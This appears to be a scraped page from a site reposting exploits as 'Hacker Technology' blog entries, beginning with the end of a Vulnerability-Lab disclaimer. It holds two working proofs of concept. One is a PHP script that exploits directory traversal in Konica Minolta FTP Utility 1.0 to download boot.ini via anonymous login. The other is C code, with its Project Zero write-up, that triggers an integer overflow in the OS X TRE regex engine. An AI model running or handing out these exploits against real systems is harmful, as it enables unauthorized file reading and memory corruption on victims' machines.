expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
  24. HireHackking

    Konica Minolta FTP Utility 1.0 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    /* --------------------------------------------------------------------- Konica Minolta FTP Utility directory traversal vulnerability Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org/ Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html --------------------------------------------------------------------- */ <?php $local_file = 'boot.ini.txt'; $server_file = '..\..\..\..\..\..\..\..\boot.ini'; $conn_id = ftp_connect($ftp_server); $login_result = ftp_login($conn_id, "anonymous", "anonymous"); if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) { echo "Successfully written to $local_file\n"; } else { echo "There was a problem\n"; } ftp_close($conn_id); ?> ---------------------------------------------------------------------
  25. HireHackking

    Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow

    HireHackking posted a blog entry in Hacker Technology
    Source: https://code.google.com/p/google-security-research/issues/detail?id=429 The OS X regex engine function tre_tnfa_run_parallel contains the following code: int tbytes; ... if (!match_tags) num_tags = 0; else num_tags = tnfa->num_tags; ... { int rbytes, pbytes, total_bytes; char *tmp_buf; /* Compute the length of the block we need. */ tbytes = sizeof(*tmp_tags) * num_tags; rbytes = sizeof(*reach_next) * (tnfa->num_states + 1); pbytes = sizeof(*reach_pos) * tnfa->num_states; total_bytes = (sizeof(long) - 1) * 4 /* for alignment paddings */ + (rbytes + tbytes * tnfa->num_states) * 2 + tbytes + pbytes; DPRINT(("tre_tnfa_run_parallel, allocate %d bytes\n", total_bytes)); /* Allocate the memory. */ #ifdef TRE_USE_ALLOCA buf = alloca(total_bytes); #else /* !TRE_USE_ALLOCA */ buf = xmalloc((unsigned)total_bytes); <-- malloc is called, not alloca #endif /* !TRE_USE_ALLOCA */ if (buf == NULL) return REG_ESPACE; memset(buf, 0, (size_t)total_bytes); num_states and num_tags are computed based on the requirements of the regex and it's quite easy to make them each >64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags. The types here are all over the place and there's conversion between int, unsigned's and size_t. The attached PoC causes total_bytes to become negative leading to total_bytes being sign-extended in the memset call. Severity medium because I haven't looked for exposed attack surface yet, but this doesn't require any non-standard flags (only REG_EXTENDED which is almost always used.) Proof of Concept: //ianbeer #include <pthread.h> #include <regex.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define DEFAULT_REG_FLAGS (REG_EXTENDED) void* go(void* arg){ unsigned int nesting_level = 20; size_t inner_size = nesting_level*2+10; char* inner = malloc(inner_size); memset(inner, '(', nesting_level); inner[nesting_level] = '\\'; inner[nesting_level+1] = '1'; memset(&inner[nesting_level+2], ')', nesting_level); inner[nesting_level*2+2] = '\x00'; unsigned int n_captures = 0x1000; char* regex = malloc(n_captures * inner_size + 100); strcpy(regex, "f(o)o((b)a(r))"); for (unsigned int i = 0; i < n_captures; i++) { strcat(regex, inner); } strcat(regex, "r\\1o|\\2f|\\3l|\\4"); const char* match_against = "hellothar!"; regex_t re; int err = regcomp (&re, regex, DEFAULT_REG_FLAGS); if (err == 0) { void* something = malloc(100); regexec (&re, match_against, 1, (regmatch_t*)something, DEFAULT_REG_FLAGS); } return NULL; } int main (int argc, char const** argv) { go(NULL); return 0; }